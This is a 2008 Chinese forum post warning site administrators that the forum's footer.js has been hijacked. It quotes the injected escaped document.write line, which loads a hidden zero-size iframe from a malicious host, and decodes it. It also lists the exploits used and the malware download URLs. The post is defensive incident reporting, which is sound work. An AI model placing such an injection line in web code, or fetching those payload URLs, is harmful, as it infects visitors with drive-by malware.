ly5360 2008-2-5 10:58
网站发现新病毒!管理请进!
挂在了footer.js上面了
footer.js里面的代码是
document.write(unescape("%3Ciframe%20src%3Dhttp%3A//www.10wip.com/sohu/index.htm%3F802%20width%3D0%20height%3D0%3E%3C/iframe%3E"));
加密了。。解密后的地址是:
[color=red]<iframe src=http://www.10wip.com/sohu/index.htm?802 width=0 height=0></iframe>[/color]
大家可以看里面的东西了。又是以往的方式。。挂的马很全。。
MS06-014,REAL,联众,暴风,迅雷,PPS,QVOD。。应有具有。。
下载的东东基本就是
[color=#810081]http://www.10wip.com/sohu/ok.exe[/color](很恶劣。。)
然后OK.EXE没看到机器狗的样子,不过是个下载器了 。分别下载以下内容。
[color=#0000ff]http://www.10wip.com/sohu/1[/color]到35.exe
[color=#810081]http://union.196462035.cn/down/1[/color]到5.exe
详细分析,请见:
网马分析-鹤城青华综合论坛又被挂马~~ - 死性不改's Blog~
[url=http://www.clxp.net.cn/article.asp?id=810]http://www.clxp.net.cn/article.asp?id=810[/url]
[attach]93[/attach]